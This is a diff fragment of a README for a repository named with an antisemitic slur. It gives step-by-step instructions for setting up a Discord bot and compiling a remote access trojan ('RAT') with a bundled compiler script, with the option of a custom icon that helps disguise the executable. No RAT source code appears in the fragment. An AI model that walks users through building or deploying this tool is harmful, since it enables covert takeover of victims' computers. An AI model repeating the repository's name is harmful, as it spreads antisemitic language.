gabrielzv1233/JewFuss-XT/readme.md

 5. Scroll down to **Privileged Gateway Intents** and enable **Presence**, **Server Members**, and **Message Content** intents.

 ### Compiling the RAT
+> You can also use `easy-compiler-ui.py` for ease of use, but most steps will look the same
 1. If using a terminal, navigate to the project’s root folder using `cd folderpath` and run `python easy-compiler.py`.
    If using an IDE like [Visual Studio Code](https://code.visualstudio.com/), open the project folder, open `easy-compiler.py`, and press the **Run** button. *(You may need to configure Python in your IDE first.)*
 2. Choose whether to use a custom icon by typing `y` or `n` (`yes` or `no` also work).
 If you select **yes**, a file chooser will open.
 If **no**, the default icon will be used.